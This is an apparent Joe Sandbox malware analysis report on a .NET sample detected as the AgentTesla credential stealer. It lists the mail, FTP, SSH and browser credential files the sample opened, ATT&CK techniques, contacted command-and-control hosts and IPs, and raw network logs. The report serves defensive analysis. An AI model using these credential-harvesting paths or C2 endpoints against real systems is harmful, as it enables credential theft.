                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara match File source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: aspnet_regbrowsers.exe PID: 408, type: MEMORYSTR

                      Remote Access Functionality:

                      Yara detected AgentTesla

                      Mitre Att&ck Matrix

                      | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
                      | Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Process Injection 312 | Disable or Modify Tools 1 | OS Credential Dumping 2 | System Information Discovery 114 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
                      | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 1 | Input Capture 1 | Query Registry 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
                      | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 1 | Credentials in Registry 1 | Security Software Discovery 121 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
                      | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 11 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud |
                      | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Timestomp 1 | LSA Secrets | Virtualization/Sandbox Evasion 131 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 12 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
                      | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 131 | Cached Domain Credentials | Application Window Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
                      | External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 312 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
W7UbgU8x18.exe | 36% | Virustotal |
W7UbgU8x18.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
W7UbgU8x18.exe | 100% | Joe Sandbox ML |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
2.0.aspnet_regbrowsers.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8
2.0.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
2.0.aspnet_regbrowsers.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8
2.0.aspnet_regbrowsers.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8
2.2.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
2.0.aspnet_regbrowsers.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

Source | Detection | Scanner | Label
odin.mk-host.com | 1% | Virustotal |

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://194.85.248.219 | 0% | Avira URL Cloud | safe
http://odin.mk-host.com | 1% | Virustotal |
http://odin.mk-host.com | 0% | Avira URL Cloud | safe
http://194.85.248.219/token_ta992i.txt | 0% | Virustotal |
http://194.85.248.219/token_ta992i.txt | 0% | Avira URL Cloud | safe
http://crl.comodoca | 0% | Avira URL Cloud | safe
http://sGexjS.com | 0% | Avira URL Cloud | safe
http://194.85.248.219/publickey.txt | 0% | Avira URL Cloud | safe
http://m3kI8gc4jNB3oWFQtMC.org | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
odin.mk-host.com | 209.205.200.74 | true | true |  | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://194.85.248.219/token_ta992i.txt | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://194.85.248.219/publickey.txt | false | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries


                                                    Contacted IPs


                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
209.205.200.74 | odin.mk-host.com | United States | 55081 | 24SHELLSUS | true
194.85.248.219 | unknown | Russian Federation | 35478 | DATACENTERRO | false

                                                    General Information

                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                    Analysis ID:528611
                                                    Start date:25.11.2021
                                                    Start time:14:59:18
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 8m 36s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:W7UbgU8x18 (renamed file extension from none to exe)
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:29
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/7@1/2
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 0.2% (good quality ratio 0.1%)
                                                    • Quality average: 41%
                                                    • Quality standard deviation: 41%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 43
                                                    • Number of non-executed functions: 5
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    Warnings:
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.54.110.249
                                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
• Not all processes were analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

Time | Type | Description
15:00:39 | API Interceptor | 726x Sleep call for process: aspnet_regbrowsers.exe modified
15:00:43 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs


                                                                                            Domains


                                                                                            ASN

                                                                                            INV.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.250
                                                                                            CV.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.250
                                                                                            TMR590241368.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.115
                                                                                            vIyyHkRXJnGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            267A80yAhpGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            QJYxAALd23Get hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            z4bJfjXDDQGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            XXaLHoecGpGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            AGiCic4uDzGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            3B3BMxYG8nGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            6WMo1OYmk3Get hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            dycuTng5W8Get hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            xINX4f5M8sGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            SSIuSyaBAFGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            IMG600094173852.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.115

                                                                                            JA3 Fingerprints

                                                                                            No context

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_W7UbgU8x18.exe_31f1e8177b64c27c98341b539e8a5b3c0473765_6dc08ccc_19fa331d\Report.wer
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):1.096973568105997
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:2lnAlyoZooaHBUZMXSaKsUAe5Z/u7s0S274It9:onAUiolBUZMXSaluZ/u7s0X4It9
                                                                                            MD5:02EF02D2B701A2F22EF28F8A91B293DD
                                                                                            SHA1:0AC42F26155E7234072A6050D6689DF870D4C778
                                                                                            SHA-256:8C11AC9C42AC81E3851DFC5F567C85B713A6BC46755D001BFD43E0B0E127FE4C
                                                                                            SHA-512:BF9A6AF55EA1993BC0809A461447C7270F8D23808CF5E1CFFDC7022ABF0B6C52AD6C4CCC817C9E4BA205800DB123F15A9FFC7B58BCC8793B41DB87DDA77F280A
                                                                                            Malicious:true
                                                                                            Reputation:low
                                                                                            Preview: Version=1 EventType=CLR20r3 EventTime=132823548311895024 ReportType=2 Consent=1 UploadTime=132823548420957134 ReportStatus=524384 ReportIdentifier=d391e953-e7a1-4a73-93bb-d3c76266048e IntegratorReportIdentifier=cb4a639e-3e83-44df-ab87-a1629d190cad Wow64Host=34404 Wow64Guest=332 NsAppName=W7UbgU8x18.exe OriginalFilename=tuneraidfix.exe AppSessionGuid=0000160c-0001-0016-09c2-633650e2d701 TargetAppId=W:000615c7b274d0fe532efb8e52cf9563400b00000000!0000c4278cf25da52adc05f4d2161a11c7b96
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B51.tmp.WERInternalMetadata.xml
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8396
                                                                                            Entropy (8bit):3.696838818148438
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Rrl7r3GLNiGq6E6YIqSUeEQgmfZeVSNCprC89bZesfDmIzm:RrlsNiz6E6YFSUeEQgmfiSeZdfSx
                                                                                            MD5:4CE5FAD37F9ED557C1C5490697F78059
                                                                                            SHA1:0E0871C79981EF7D2487AFA0963C88E9139CB643
                                                                                            SHA-256:3E3AB02E3555C551DD8EE205CF9C3F20D04C2828C78F30C5CC33A74D1A4EE650
                                                                                            SHA-512:5A0C146FE0650ACCAF568A62517F8FA4DA12ABC57C8A88E18CB9FA36BA0E7F10B3279860999972D20A4D0FD3FDA7EE11C83B830789E30F255C892E039728579C
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5644</Pid>
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F68.tmp.xml
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4740
                                                                                            Entropy (8bit):4.465185228666966
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwSD8zsVJgtWI986WSC8BAo8fm8M4J5Ly2FQ+q8vTLyUm7n1jd:uITfvH7SNMJAKVmz1jd
                                                                                            MD5:453D8F13ADC28961F1969B8D331506E0
                                                                                            SHA1:2A5C9392FE9F6A8AFAFE3F56039526D9C87A6C43
                                                                                            SHA-256:74DE17553E832B589ACE03BEBF313EBB6A10F40DA1BD789F309E6BC2E842D5C6
                                                                                            SHA-512:1C06C173C348A3F2B479D1E33B40546AD3659273DCEF57FC0ACA1F89C92DDBE36A50D2CCF33BEA295218C1F10A0C74E43B500B2423501E1FB06C660BF2FE918E
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <req ver="2"> <tlm> <src> <desc> <mach> <os> <arg nm="vermaj" val="10" /> <arg nm="vermin" val="0" /> <arg nm="verbld" val="17134" /> <arg nm="vercsdbld" val="1" /> <arg nm="verqfe" val="1" /> <arg nm="csdbld" val="1" /> <arg nm="versp" val="0" /> <arg nm="arch" val="9" /> <arg nm="lcid" val="1033" /> <arg nm="geoid" val="244" /> <arg nm="sku" val="48" /> <arg nm="domain" val="0" /> <arg nm="prodsuite" val="256" /> <arg nm="ntprodtype" val="1" /> <arg nm="platid" val="2" /> <arg nm="tmsi" val="1270571" /> <arg nm="osinsty" val="1" /> <arg nm="iever" val="11.1.17134.0-11.0.47" /> <arg nm="portos" val="0" /> <arg nm="ram" val="4096" />
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER343.tmp.dmp
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Nov 25 23:00:36 2021, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):265465
                                                                                            Entropy (8bit):4.033325209537863
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:cW5Eyjd+pSH0Nm9gIOgF5vUosoYo0WUCgUqOYD:cW5+py089RpD8mYo/Tj
                                                                                            MD5:61DEC122981DCBAF67F08434AC469B4A
                                                                                            SHA1:0A6176FB439D97D67B6BB2FB35E1389297257695
                                                                                            SHA-256:EA7D144F9261ED3EF91EC2C581E1C1DCFF59D4C35A4B72BA162EE0D7F0D749D0
                                                                                            SHA-512:65363992A31A8DCB06C79F5D6AE9D77EC54674BE389A32E901374A7BD485F650AA1586CC52F513EFB51901094523D1C4290428F2D74940751C14569B08415B5C
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1572864
                                                                                            Entropy (8bit):4.268220487373255
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:nYwMHc2yn+SCXqM+mxefKlphce5T7h0MMOb9PeLcuD7ZowN8EwDo3uu/:YwMHc2yn+SCXqM+BYto/
                                                                                            MD5:B5F6B82A5212B44A94CBE12A338DB812
                                                                                            SHA1:CC1A390F17462BB005F4896918345FB4BC15204B
                                                                                            SHA-256:C8611DE05BEFFE985DEA2AE15A55989FBBD0BA83419F7374DCF107C8AF90C203
                                                                                            SHA-512:17C27C5E40BF78B2CE94433A44730705CA78935F1440AA51E19CDE6473B5B6054F7A7BC3FD4E28328C901A5407BEC4D08637717679BF014BA1A8D9D4B592F032
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):24576
                                                                                            Entropy (8bit):3.807504640723351
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:5UF5TZrdxdXD5FQp8XXQnGOf2o/Pmxwpm5GjZmGmBDTTmb5NGUtYbm:S7Nr1XDQpl1f2o2xwpaWmGmpTmVNGUYb
                                                                                            MD5:7D4E158A3C81C4432E34E07591F31C8E
                                                                                            SHA1:7DFADAD40FC3098F78C9E2730C47F3353C3305F6
                                                                                            SHA-256:45734C12A12E5C99B6CCDE171BF321CECE88FDC91D8815A59E54979093969C18
                                                                                            SHA-512:366F38879BBF7B422E4EAFAA43789864E98B15E5CAA73891E0415FB5C6DFF42ED086C3CC8E81A64A9ACD4AB6C88ED522A689BFA390EAB71BFD7B1F1928F74055
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            \Device\ConDrv
                                                                                            Process:C:\Users\user\Desktop\W7UbgU8x18.exe
                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1306
                                                                                            Entropy (8bit):4.990885062259935
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:15wG4C4iWonzpwXWonz6OZkZWGO8sOZcTGpmmwhfoswDEkrl6eR1S1ZRpzZHVwre:sGr4iWozQWozLk8cJE5hfSIz91ZRpse
                                                                                            MD5:7685F6A27382549A35DF3EDA62761724
                                                                                            SHA1:50D09D93E5BD99DDA67FDBC0661AFBABFC2CDA13
                                                                                            SHA-256:02DC0D80E62CBEC6C231EA3AE11D32F585D558978E46D2AB533A53F87D538B7F
                                                                                            SHA-512:F3C44E4BD8123B09BF51A9C2983237F8F1C3D36F1A4CBDD9BC1CF65B0AD8426C778C02DB604D7EB20AA3100A5740C981CDF8D6413DA2B47129EF669F30052581
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:
                                                                                            Unhandled Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.ArgumentException: Process with an Id of 4896 is not running.
                                                                                               at System.Diagnostics.Process.GetProcessById(Int32 processId, String machineName)
                                                                                               at System.Diagnostics.Process.GetProcessById(Int32 processId)
                                                                                               at fixedhost.modulation.d1TYC4A1(String path, String cmd, Byte[] data, Boolean d7W15ADW2)
                                                                                               at fixedhost.modulation.cookie(String path, String cmd, Byte[] data)
                                                                                               --- End of inner exception stack trace ---
                                                                                               at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor)
                                                                                               at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments)
                                                                                               at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
                                                                                               at System.RuntimeType.InvokeMember(String name, Bind

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):4.673644197618154
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:W7UbgU8x18.exe
                                                                                            File size:24064
                                                                                            MD5:01f140fea9669403791fb89c47138d69
                                                                                            SHA1:c4278cf25da52adc05f4d2161a11c7b96928ccea
                                                                                            SHA256:f135fdb20bb785afb947173d0bbfdfedd1ce5b8c4907f6aa37e9a9a706d8a1db
                                                                                            SHA512:e0b76497aaea31d9915a65eeec2dcdc33ca7ca99377a12b1341a61733869438c02b74e5b09e52b899846e24e675c5eac17c6d940350ac2edf51c53e4a5fab8b9
                                                                                            SSDEEP:384:6ARfkJGzRvrQRkKA4rsf1t2kV5qSaciCjFortND8QobS58/pJbouSbx0Ci3HzKQC:jfkJGzFrQ/Bajf57iBDuf/pJbouSbyCp

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x40722a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp: 0xCB1B3270 [Fri Dec 24 07:40:32 2077 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x71d7           0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8000           0x5d8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x7120           0x38          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0x5230        0x5400    False     0.393322172619   data       4.77599367946    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x8000           0x5d8         0x600     False     0.430989583333   data       4.17289736273    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xa000           0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name         RVA     Size   Type                                                                             Language  Country
RT_VERSION   0x8090  0x348  data
RT_MANIFEST  0x83e8  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2021
Assembly Version  21.13.1.0
InternalName      tuneraidfix.exe
FileVersion       21.13.1.0
CompanyName       MicoTech
LegalTrademarks
Comments
ProductName       tuneraidfix
ProductVersion    21.13.1.0
FileDescription   tuneraidfix
OriginalFilename  tuneraidfix.exe

Network Behavior

Network Port Distribution

TCP Packets

                                                                                            Nov 25, 2021 15:00:19.216520071 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216537952 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.216542006 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.216581106 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.218791008 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.218811035 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.218880892 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244220972 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244267941 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244296074 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244322062 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244348049 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244385958 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244411945 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244421959 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244445086 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244450092 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244456053 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244484901 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244518042 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244555950 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244568110 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244594097 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244610071 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244632959 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244672060 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244685888 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244713068 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244725943 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244749069 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244782925 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244805098 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244820118 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244910002 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.244915009 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.244971991 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.245008945 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:19.245028973 CET4972280192.168.2.5194.85.248.219
